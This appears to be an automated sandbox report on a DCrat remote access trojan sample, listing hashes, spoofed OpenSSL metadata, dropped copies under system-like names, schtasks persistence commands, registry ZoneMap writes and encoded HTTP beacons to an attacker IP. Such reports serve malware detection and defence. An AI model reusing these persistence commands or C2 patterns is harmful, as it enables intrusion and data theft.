File name: | 2a7f476688e3754d34f958f14887b398.exe |
Full analysis: | https://app.any.run/tasks/728657dd-a9a9-45d6-9e22-5078dad76578 |
Verdict: | Malicious activity |
Threats: | DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT), which was first introduced in 2018. It is a modular malware that can be customized to perform different tasks. For instance, it can steal passwords, crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers may use a variety of methods to distribute DCrat, but phishing email campaigns are the most common. |
Analysis date: | March 31, 2023, 21:23:38 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-dosexec |
File info: | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows |
MD5: | 2A7F476688E3754D34F958F14887B398 |
SHA1: | E9ACBD7B2BF62B6AA084467E3EA7666B8EADA109 |
SHA256: | 02B1070B1D2CCF57124AE0AF4A9F4748C63287FB9D1A84FAF94B5E3F313A8E52 |
SSDEEP: | 24576:0MsMQQGIgIj7T5rhtE5nrYG80jF5jJQdMluoiz8mYhX:lsMQCgEe3q1oilYh |
.exe | | | Generic CIL Executable (.NET, Mono, etc.) (45.1) |
---|---|---|
.exe | | | Win32 Executable MS Visual C++ (generic) (19.2) |
.exe | | | Win64 Executable (generic) (17) |
.scr | | | Windows screen saver (8) |
.dll | | | Win32 Dynamic Link Library (generic) (4) |
MachineType: | Intel 386 or later, and compatibles |
---|---|
TimeStamp: | 2022:07:24 15:13:08+00:00 |
ImageFileCharacteristics: | Executable, No line numbers, No symbols, Large address aware, 32-bit |
PEType: | PE32 |
LinkerVersion: | 6 |
CodeSize: | 1337856 |
InitializedDataSize: | 13824 |
UninitializedDataSize: | - |
EntryPoint: | 0x1489ae |
OSVersion: | 4 |
ImageVersion: | - |
SubsystemVersion: | 4 |
Subsystem: | Windows GUI |
FileVersionNumber: | 1.1.1.15 |
ProductVersionNumber: | 1.1.1.15 |
FileFlagsMask: | 0x003f |
FileFlags: | (none) |
FileOS: | Win32 |
ObjectFileType: | Dynamic link library |
FileSubtype: | - |
LanguageCode: | English (U.S.) |
CharacterSet: | Unicode |
CompanyName: | - |
FileDescription: | - |
FileVersion: | 1.1.1o |
InternalName: | libcrypto |
OriginalFileName: | libcrypto |
ProductName: | - |
ProductVersion: | 1.1.1o |
LegalCopyright: | Copyright 1998-2022 The OpenSSL Authors. All rights reserved. |
Architecture: | IMAGE_FILE_MACHINE_I386 |
---|---|
Subsystem: | IMAGE_SUBSYSTEM_WINDOWS_GUI |
Compilation Date: | 24-Jul-2022 15:13:08 |
Detected languages: |
|
CompanyName: | - |
FileDescription: | - |
FileVersion: | 1.1.1o |
InternalName: | libcrypto |
OriginalFilename: | libcrypto |
ProductName: | - |
ProductVersion: | 1.1.1o |
LegalCopyright: | Copyright 1998-2022 The OpenSSL Authors. All rights reserved. |
Magic number: | MZ |
---|---|
Bytes on last page of file: | 0x0090 |
Pages in file: | 0x0003 |
Relocations: | 0x0000 |
Size of header: | 0x0004 |
Min extra paragraphs: | 0x0000 |
Max extra paragraphs: | 0xFFFF |
Initial SS value: | 0x0000 |
Initial SP value: | 0x00B8 |
Checksum: | 0x0000 |
Initial IP value: | 0x0000 |
Initial CS value: | 0x0000 |
Overlay number: | 0x0000 |
OEM identifier: | 0x0000 |
OEM information: | 0x0000 |
Address of NE header: | 0x00000080 |
Signature: | PE |
---|---|
Machine: | IMAGE_FILE_MACHINE_I386 |
Number of sections: | 4 |
Time date stamp: | 24-Jul-2022 15:13:08 |
Pointer to Symbol Table: | 0x00000000 |
Number of symbols: | 0 |
Size of Optional Header: | 0x00E0 |
Characteristics: |
|
Name | Virtual Address | Virtual Size | Raw Size | Charateristics | Entropy |
---|---|---|---|---|---|
.text | 0x00002000 | 0x001469B4 | 0x00146A00 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 7.1048 |
.sdata | 0x0014A000 | 0x00002FDF | 0x00003000 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 3.24203 |
.rsrc | 0x0014E000 | 0x0000031C | 0x00000400 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 2.64338 |
.reloc | 0x00150000 | 0x0000000C | 0x00000200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ | 0.10191 |
Title | Entropy | Size | Codepage | Language | Type |
---|---|---|---|---|---|
1 | 3.33524 | 708 | UNKNOWN | English - United States | RT_VERSION |
mscoree.dll |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1636 | "C:\Users\admin\AppData\Local\Temp\2a7f476688e3754d34f958f14887b398.exe" | C:\Users\admin\AppData\Local\Temp\2a7f476688e3754d34f958f14887b398.exe | explorer.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Version: 1.1.1o Modules
| |||||||||||||||
1216 | schtasks.exe /create /tn "lsml" /sc MINUTE /mo 10 /tr "'C:\Users\admin\Cookies\lsm.exe'" /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
836 | schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\Users\admin\Cookies\lsm.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
1196 | schtasks.exe /create /tn "lsml" /sc MINUTE /mo 5 /tr "'C:\Users\admin\Cookies\lsm.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
1452 | schtasks.exe /create /tn "servicess" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Documents\services.exe'" /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
1260 | schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\All Users\Documents\services.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
2164 | schtasks.exe /create /tn "servicess" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\Documents\services.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
2332 | schtasks.exe /create /tn "explorere" /sc MINUTE /mo 5 /tr "'C:\Windows\tracing\explorer.exe'" /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
2428 | schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\tracing\explorer.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
2524 | schtasks.exe /create /tn "explorere" /sc MINUTE /mo 12 /tr "'C:\Windows\tracing\explorer.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
|
(PID) Process: | (1636) 2a7f476688e3754d34f958f14887b398.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (1636) 2a7f476688e3754d34f958f14887b398.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (1636) 2a7f476688e3754d34f958f14887b398.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
(PID) Process: | (1636) 2a7f476688e3754d34f958f14887b398.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
1636 | 2a7f476688e3754d34f958f14887b398.exe | C:\Windows\Tasks\886983d96e3d3e | text | |
MD5:B1C526DB6ED2A7463D5CC997B1FFE12C | SHA256:DC0B8862388775504805AF113E4537D741949FEC0DA44E70A652411AD9EC9430 | |||
1636 | 2a7f476688e3754d34f958f14887b398.exe | C:\Windows\Tasks\csrss.exe | executable | |
MD5:2A7F476688E3754D34F958F14887B398 | SHA256:02B1070B1D2CCF57124AE0AF4A9F4748C63287FB9D1A84FAF94B5E3F313A8E52 | |||
1636 | 2a7f476688e3754d34f958f14887b398.exe | C:\Users\Public\Documents\c5b4cb5e9653cc | text | |
MD5:C0AFDDAE94EB1059BD3074A4936AABAB | SHA256:054A00EA473B26BB4BB5E78494E82911DEDBCEC5AE1E6A95561FCFA75A91FB58 | |||
1636 | 2a7f476688e3754d34f958f14887b398.exe | C:\Windows\tracing\explorer.exe | executable | |
MD5:2A7F476688E3754D34F958F14887B398 | SHA256:02B1070B1D2CCF57124AE0AF4A9F4748C63287FB9D1A84FAF94B5E3F313A8E52 | |||
1636 | 2a7f476688e3754d34f958f14887b398.exe | C:\Users\Public\Documents\services.exe | executable | |
MD5:2A7F476688E3754D34F958F14887B398 | SHA256:02B1070B1D2CCF57124AE0AF4A9F4748C63287FB9D1A84FAF94B5E3F313A8E52 | |||
1636 | 2a7f476688e3754d34f958f14887b398.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\csrss.exe | executable | |
MD5:2A7F476688E3754D34F958F14887B398 | SHA256:02B1070B1D2CCF57124AE0AF4A9F4748C63287FB9D1A84FAF94B5E3F313A8E52 | |||
1636 | 2a7f476688e3754d34f958f14887b398.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\lsm.exe | executable | |
MD5:2A7F476688E3754D34F958F14887B398 | SHA256:02B1070B1D2CCF57124AE0AF4A9F4748C63287FB9D1A84FAF94B5E3F313A8E52 | |||
1636 | 2a7f476688e3754d34f958f14887b398.exe | C:\ProgramData\Adobe\ARM\Reader_15.007.20033\2a7f476688e3754d34f958f14887b398.exe | executable | |
MD5:2A7F476688E3754D34F958F14887B398 | SHA256:02B1070B1D2CCF57124AE0AF4A9F4748C63287FB9D1A84FAF94B5E3F313A8E52 | |||
1636 | 2a7f476688e3754d34f958f14887b398.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\101b941d020240 | text | |
MD5:4D9E6228360678690C9C6CF02A075CAE | SHA256:56109DC5040D91E0B6375AACA1CFA2601C081DC084A3828AE4CE7BACE2976901 | |||
1636 | 2a7f476688e3754d34f958f14887b398.exe | C:\ProgramData\Adobe\ARM\Reader_15.007.20033\1f09b7cb87a861 | text | |
MD5:3377B582A9FCD8DCB63C3D3E2D14B81A | SHA256:AE4588309D6A76DD77DAD00B01B7AB217C6D26244264E8E599AE2B8B4BABA76B |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2116 | csrss.exe | GET | 200 | 135.181.106.220:80 | http://135.181.106.220/JavascriptApi/72sql8/Dle2/1TrafficPublicpublic/8packetMariadb/httptest/1privateGame/Cpu7/Protect5test/Js/2/8/0/ProtectjavascriptprotonJavascript/Poll/JavascriptDle/httpdownloadsserver/Dumpprotect/Javascriptauth.php?11kVEIGgqDq2PBEGi=6DVejSrYuiXY5Ad&d3d72683d2c0232992cff4971111ff7e=gZjdTZjNDZhhjMxMTNxQjYjFDMjBDZhdjYyYTZlZzYkhzN4M2YhFDNyMzM0UDO0kDMyQDOwgjN&20e5506d7ac514eded4e5e7e8ef2b124=AZkRTOkJTZ3UTMyYDO5YjZ0ImZ3EzNiFWZ1cTZ0E2YxEGMkVmNyYDO&deeaf6476c58a3f1b726bc4bddc4a8e2=QX9JCMslEbohlW1VVRWJkUFVlVSFTUKJVVS5EbFh1YONjYsJ1VhdFeGhVdsdlYrZ0RYNmTuNGbOhlVjhHbPRkSDxUaVdUZsVzQPVTTql1MnR0TwUkaaRTVU9UbSpXTrJFVONTTUpFNnpmTyMGRO1GZUlVe3ZEW61ERNdXSqx0MBRUT1VFVNZmSYp1aGdlWThnRY5kSWF1Y4ZlWplzRaJEeGhleKhlW6ZlRJNHeXF1Y4FzY5ZlMjZFeGhlNNtWSzl0UaRjVtxkeO52Y650RYNmUyImdoVEZsVTRYNWNXFGdSdVWjhXMjlnVyMmV4ZEW200aJNXSTpFNW1GT65kbjpnTHh1YONTY6Z0RWNGexM2M5ckW1xmMWNGes9ERKNETpV1RlxWNpNGbKNjYzJESlxGeGhlb1cVYqZUbjBDeGhlekNjYrVzVhhFeGhlNNtWSzl0UaRjVtxkeWJTWwplbjxmTIh1YOhEZ1Z1ViFjTyIWR4ZEW6pEWapnVGl0c4dVUjhXMjlnVyMmV4ZEW200aJNXSTpFNW1GT05ESiNGexMGbsJTY2ljMRNGesJGcxckWohnRYpnSYpleWZEWjBneRl2dplEbohlW1dGVPpXSy4ENnRkT4l1RPFzaqpFMNRkWwUleOpXVH9ENZpmTzElaaNTRt10Y4Z0Y0Z1RWNGeGJGaOJjYNhnRYhmUYlVRCh0YChnRYVHbXJ2aGdEWj5kbjxmTYZ1Y4x2TEpUeXJiOiU2MmNzNxQTN0EGOxcTYlZmY1UzYyUTYjNzYhNjMyUGMiwiI0UDMzgDZ1MmZ2UjZ5IWN3QjYhdTOxUWMzMWMkVGOyMTOldTZzcTZ0IiOiYTZxcTZjVWZzU2YyMTM1UGOmZTNxEDMxkTYmFWZ2IWMiwiI3ETZlFTM0IDNwUDZ2EmYmVWNjJTM3IzY2QjMxAjZwMDMkZmY4ADZkJiOiIGOkhDOwIDMhZDOzczNlZDNyMzY0ImNmRmNwQzYjJTNis3W | FI | text | 2.14 Kb | malicious |
2116 | csrss.exe | GET | 200 | 135.181.106.220:80 | http://135.181.106.220/JavascriptApi/72sql8/Dle2/1TrafficPublicpublic/8packetMariadb/httptest/1privateGame/Cpu7/Protect5test/Js/2/8/0/ProtectjavascriptprotonJavascript/Poll/JavascriptDle/httpdownloadsserver/Dumpprotect/Javascriptauth.php?dCyX4oXrMycPus=e2&LJXSRopXhIRHpYRkkDuDCY8wWdPJ90=4DESyDKvJsgH&ZEJD7KH7=z3wLk6xZgYqwXElFdhZSkVfR&a2e9c0159d198200f9db62a53d639a8f=8970924aabf2c4ce73108f2068e0f32f&20e5506d7ac514eded4e5e7e8ef2b124=gYkZTM1EGOyEGN4EGOzYjZkRzNyIzY3UWOiZGNwEGMzcTNmRDNzM2Y&dCyX4oXrMycPus=e2&LJXSRopXhIRHpYRkkDuDCY8wWdPJ90=4DESyDKvJsgH&ZEJD7KH7=z3wLk6xZgYqwXElFdhZSkVfR | FI | text | 2.14 Kb | malicious |
2116 | csrss.exe | GET | 200 | 135.181.106.220:80 | http://135.181.106.220/JavascriptApi/72sql8/Dle2/1TrafficPublicpublic/8packetMariadb/httptest/1privateGame/Cpu7/Protect5test/Js/2/8/0/ProtectjavascriptprotonJavascript/Poll/JavascriptDle/httpdownloadsserver/Dumpprotect/Javascriptauth.php?11kVEIGgqDq2PBEGi=6DVejSrYuiXY5Ad&d3d72683d2c0232992cff4971111ff7e=gZjdTZjNDZhhjMxMTNxQjYjFDMjBDZhdjYyYTZlZzYkhzN4M2YhFDNyMzM0UDO0kDMyQDOwgjN&20e5506d7ac514eded4e5e7e8ef2b124=AZkRTOkJTZ3UTMyYDO5YjZ0ImZ3EzNiFWZ1cTZ0E2YxEGMkVmNyYDO&18828b6ecf39a1344d11ef65d30b5077=d1nI4ADZ1E2YmJGN4YmZ1gjNmFDZzUzN5MDO1AjZ5cDNwkjMyUDZkdzNxIiOiYTZxcTZjVWZzU2YyMTM1UGOmZTNxEDMxkTYmFWZ2IWMiwiI3ETZlFTM0IDNwUDZ2EmYmVWNjJTM3IzY2QjMxAjZwMDMkZmY4ADZkJiOiIGOkhDOwIDMhZDOzczNlZDNyMzY0ImNmRmNwQzYjJTNis3W&5e8207655a113c04c1d3106096c113c6=0VfiIiOiU2MmNzNxQTN0EGOxcTYlZmY1UzYyUTYjNzYhNjMyUGMiwiI4ADZ1E2YmJGN4YmZ1gjNmFDZzUzN5MDO1AjZ5cDNwkjMyUDZkdzNxIiOiYTZxcTZjVWZzU2YyMTM1UGOmZTNxEDMxkTYmFWZ2IWMiwiI3ETZlFTM0IDNwUDZ2EmYmVWNjJTM3IzY2QjMxAjZwMDMkZmY4ADZkJiOiIGOkhDOwIDMhZDOzczNlZDNyMzY0ImNmRmNwQzYjJTNisHL9JSOWp2TpFFWkZnVXJGcSZ0YsZ1RiRlSDxUaV1GZwJ1MZJkSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUavpWSzkzRaVHbyYVVOVVUpdXaJ9kSp9UawcVWqp0VahlTYFWa3lWSapUaPlWVtJmdod0Y2p0MZBXMwMGcKNETptWeNd2YtJGcCh0YsJ1MVdWUU90Z3dlWrlzVUdWWElUN4dVY0ZUbSdWUq50cWdEZ1xWRLd2bINFSCpnT1lERJFkQTZVUOVUS3FEROJDMT5EcCN1SOJlRLxmSzIGRCN1STh2QixmUuJmSKl2TpV1VihWNVZVUOtWSzl0ULJUOpR1bBl2YsJFSjhmUXF1ZNNTWwh2RjhmSzI1ZFBjUXJ0QalnRHpVdGdEZUpUaPlWVXJGa1UlVRR2aJNXSpRVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNkYoVjMiBnTzMGbaJjY5JkRJNTQ5N2M5ckW1xmMWl2bqlUeW1mV1xmMWl2dTZWaNhFZwVzRiBnWxwEbCNjY5ZFWSl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJNVWwVzVZFDaHRGc4VUS0F0QaxGbtpFcOdlW35ESJBTOtRVavpWSup0Mil2dplUNnpWT6RTeNl3dD9EeNR1T1VFVOl2bqlka5ckYpdXaJVFerlkNJNVZ5JlbiFTOykVa3lWS1IFWhNnRHNGcOdVY1ZFWUd2aIRGcOVUSwZ0VhNnVYlFcxcjd2NzN2ZHTp9Ua0IjYwR2ValnSDxUardVWwh3VkhGbXZ3LrUmdvsSdJZTSTVGMsJTWpdXaJhXSq1UdVpnT4RTaOdXSqxUMnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiU2MmNzNxQTN0EGOxcTYlZmY1UzYyUTYjNzYhNjMyUGMiwiIzQGOjVmMzMGOlJGN1UjZjFDO3I2MxUDOhRjY4MmNhhzNxI2MkR2YzIiOiYTZxcTZjVWZzU2YyMTM1UGOmZTNxEDMxkTYmFWZ2IWMiwiI3ETZlFTM0IDNwUDZ2EmYmVWNjJTM3IzY2QjMxAjZwMDMkZmY4ADZkJiOiIGOkhDOwIDMhZDOzczNlZDNyMzY0ImNmRmNwQzYjJTNis3W | FI | text | 104 b | malicious |
2116 | csrss.exe | GET | 200 | 135.181.106.220:80 | http://135.181.106.220/JavascriptApi/72sql8/Dle2/1TrafficPublicpublic/8packetMariadb/httptest/1privateGame/Cpu7/Protect5test/Js/2/8/0/ProtectjavascriptprotonJavascript/Poll/JavascriptDle/httpdownloadsserver/Dumpprotect/Javascriptauth.php?11kVEIGgqDq2PBEGi=6DVejSrYuiXY5Ad&d3d72683d2c0232992cff4971111ff7e=gZjdTZjNDZhhjMxMTNxQjYjFDMjBDZhdjYyYTZlZzYkhzN4M2YhFDNyMzM0UDO0kDMyQDOwgjN&20e5506d7ac514eded4e5e7e8ef2b124=AZkRTOkJTZ3UTMyYDO5YjZ0ImZ3EzNiFWZ1cTZ0E2YxEGMkVmNyYDO&18828b6ecf39a1344d11ef65d30b5077=d1nI4ADZ1E2YmJGN4YmZ1gjNmFDZzUzN5MDO1AjZ5cDNwkjMyUDZkdzNxIiOiYTZxcTZjVWZzU2YyMTM1UGOmZTNxEDMxkTYmFWZ2IWMiwiI3ETZlFTM0IDNwUDZ2EmYmVWNjJTM3IzY2QjMxAjZwMDMkZmY4ADZkJiOiIGOkhDOwIDMhZDOzczNlZDNyMzY0ImNmRmNwQzYjJTNis3W&5e8207655a113c04c1d3106096c113c6=0VfiIiOiU2MmNzNxQTN0EGOxcTYlZmY1UzYyUTYjNzYhNjMyUGMiwiI4ADZ1E2YmJGN4YmZ1gjNmFDZzUzN5MDO1AjZ5cDNwkjMyUDZkdzNxIiOiYTZxcTZjVWZzU2YyMTM1UGOmZTNxEDMxkTYmFWZ2IWMiwiI3ETZlFTM0IDNwUDZ2EmYmVWNjJTM3IzY2QjMxAjZwMDMkZmY4ADZkJiOiIGOkhDOwIDMhZDOzczNlZDNyMzY0ImNmRmNwQzYjJTNisHL9JSOWp2TpFFWkZnVXJGcSZ0YsZ1RiRlSDxUaV1GZwJ1MZJkSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUavpWSzkzRaVHbyYVVOVVUpdXaJ9kSp9UawcVWqp0VahlTYFWa3lWSapUaPlWVtJmdod0Y2p0MZBXMwMGcKNETptWeNd2YtJGcCh0YsJ1MVdWUU90Z3dlWrlzVUdWWElUN4dVY0ZUbSdWUq50cWdEZ1xWRLd2bINFSCpnT1lERJFkQTZVUOVUS3FEROJDMT5EcCN1SOJlRLxmSzIGRCN1STh2QixmUuJmSKl2TpV1VihWNVZVUOtWSzl0ULJUOpR1bBl2YsJFSjhmUXF1ZNNTWwh2RjhmSzI1ZFBjUXJ0QalnRHpVdGdEZUpUaPlWVXJGa1UlVRR2aJNXSpRVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNkYoVjMiBnTzMGbaJjY5JkRJNTQ5N2M5ckW1xmMWl2bqlUeW1mV1xmMWl2dTZWaNhFZwVzRiBnWxwEbCNjY5ZFWSl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJNVWwVzVZFDaHRGc4VUS0F0QaxGbtpFcOdlW35ESJBTOtRVavpWSup0Mil2dplUNnpWT6RTeNl3dD9EeNR1T1VFVOl2bqlka5ckYpdXaJVFerlkNJNVZ5JlbiFTOykVa3lWS1IFWhNnRHNGcOdVY1ZFWUd2aIRGcOVUSwZ0VhNnVYlFcxcjd2NzN2ZHTp9Ua0IjYwR2ValnSDxUardVWwh3VkhGbXZ3LrUmdvsSdJZTSTVGMsJTWpdXaJhXSq1UdVpnT4RTaOdXSqxUMnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiU2MmNzNxQTN0EGOxcTYlZmY1UzYyUTYjNzYhNjMyUGMiwiIzQGOjVmMzMGOlJGN1UjZjFDO3I2MxUDOhRjY4MmNhhzNxI2MkR2YzIiOiYTZxcTZjVWZzU2YyMTM1UGOmZTNxEDMxkTYmFWZ2IWMiwiI3ETZlFTM0IDNwUDZ2EmYmVWNjJTM3IzY2QjMxAjZwMDMkZmY4ADZkJiOiIGOkhDOwIDMhZDOzczNlZDNyMzY0ImNmRmNwQzYjJTNis3W | FI | text | 104 b | malicious |
2116 | csrss.exe | GET | 200 | 135.181.106.220:80 | http://135.181.106.220/JavascriptApi/72sql8/Dle2/1TrafficPublicpublic/8packetMariadb/httptest/1privateGame/Cpu7/Protect5test/Js/2/8/0/ProtectjavascriptprotonJavascript/Poll/JavascriptDle/httpdownloadsserver/Dumpprotect/Javascriptauth.php?11kVEIGgqDq2PBEGi=6DVejSrYuiXY5Ad&d3d72683d2c0232992cff4971111ff7e=gZjdTZjNDZhhjMxMTNxQjYjFDMjBDZhdjYyYTZlZzYkhzN4M2YhFDNyMzM0UDO0kDMyQDOwgjN&20e5506d7ac514eded4e5e7e8ef2b124=AZkRTOkJTZ3UTMyYDO5YjZ0ImZ3EzNiFWZ1cTZ0E2YxEGMkVmNyYDO&18828b6ecf39a1344d11ef65d30b5077=d1nI4ADZ1E2YmJGN4YmZ1gjNmFDZzUzN5MDO1AjZ5cDNwkjMyUDZkdzNxIiOiYTZxcTZjVWZzU2YyMTM1UGOmZTNxEDMxkTYmFWZ2IWMiwiI3ETZlFTM0IDNwUDZ2EmYmVWNjJTM3IzY2QjMxAjZwMDMkZmY4ADZkJiOiIGOkhDOwIDMhZDOzczNlZDNyMzY0ImNmRmNwQzYjJTNis3W&5e8207655a113c04c1d3106096c113c6=0VfiIiOiU2MmNzNxQTN0EGOxcTYlZmY1UzYyUTYjNzYhNjMyUGMiwiI4ADZ1E2YmJGN4YmZ1gjNmFDZzUzN5MDO1AjZ5cDNwkjMyUDZkdzNxIiOiYTZxcTZjVWZzU2YyMTM1UGOmZTNxEDMxkTYmFWZ2IWMiwiI3ETZlFTM0IDNwUDZ2EmYmVWNjJTM3IzY2QjMxAjZwMDMkZmY4ADZkJiOiIGOkhDOwIDMhZDOzczNlZDNyMzY0ImNmRmNwQzYjJTNisHL9JSOWp2TpFFWkZnVXJGcSZ0YsZ1RiRlSDxUaV1GZwJ1MZJkSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUavpWSzkzRaVHbyYVVOVVUpdXaJ9kSp9UawcVWqp0VahlTYFWa3lWSapUaPlWVtJmdod0Y2p0MZBXMwMGcKNETptWeNd2YtJGcCh0YsJ1MVdWUU90Z3dlWrlzVUdWWElUN4dVY0ZUbSdWUq50cWdEZ1xWRLd2bINFSCpnT1lERJFkQTZVUOVUS3FEROJDMT5EcCN1SOJlRLxmSzIGRCN1STh2QixmUuJmSKl2TpV1VihWNVZVUOtWSzl0ULJUOpR1bBl2YsJFSjhmUXF1ZNNTWwh2RjhmSzI1ZFBjUXJ0QalnRHpVdGdEZUpUaPlWVXJGa1UlVRR2aJNXSpRVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNkYoVjMiBnTzMGbaJjY5JkRJNTQ5N2M5ckW1xmMWl2bqlUeW1mV1xmMWl2dTZWaNhFZwVzRiBnWxwEbCNjY5ZFWSl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJNVWwVzVZFDaHRGc4VUS0F0QaxGbtpFcOdlW35ESJBTOtRVavpWSup0Mil2dplUNnpWT6RTeNl3dD9EeNR1T1VFVOl2bqlka5ckYpdXaJVFerlkNJNVZ5JlbiFTOykVa3lWS1IFWhNnRHNGcOdVY1ZFWUd2aIRGcOVUSwZ0VhNnVYlFcxcjd2NzN2ZHTp9Ua0IjYwR2ValnSDxUardVWwh3VkhGbXZ3LrUmdvsSdJZTSTVGMsJTWpdXaJhXSq1UdVpnT4RTaOdXSqxUMnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiU2MmNzNxQTN0EGOxcTYlZmY1UzYyUTYjNzYhNjMyUGMiwiIzQGOjVmMzMGOlJGN1UjZjFDO3I2MxUDOhRjY4MmNhhzNxI2MkR2YzIiOiYTZxcTZjVWZzU2YyMTM1UGOmZTNxEDMxkTYmFWZ2IWMiwiI3ETZlFTM0IDNwUDZ2EmYmVWNjJTM3IzY2QjMxAjZwMDMkZmY4ADZkJiOiIGOkhDOwIDMhZDOzczNlZDNyMzY0ImNmRmNwQzYjJTNis3W | FI | text | 104 b | malicious |
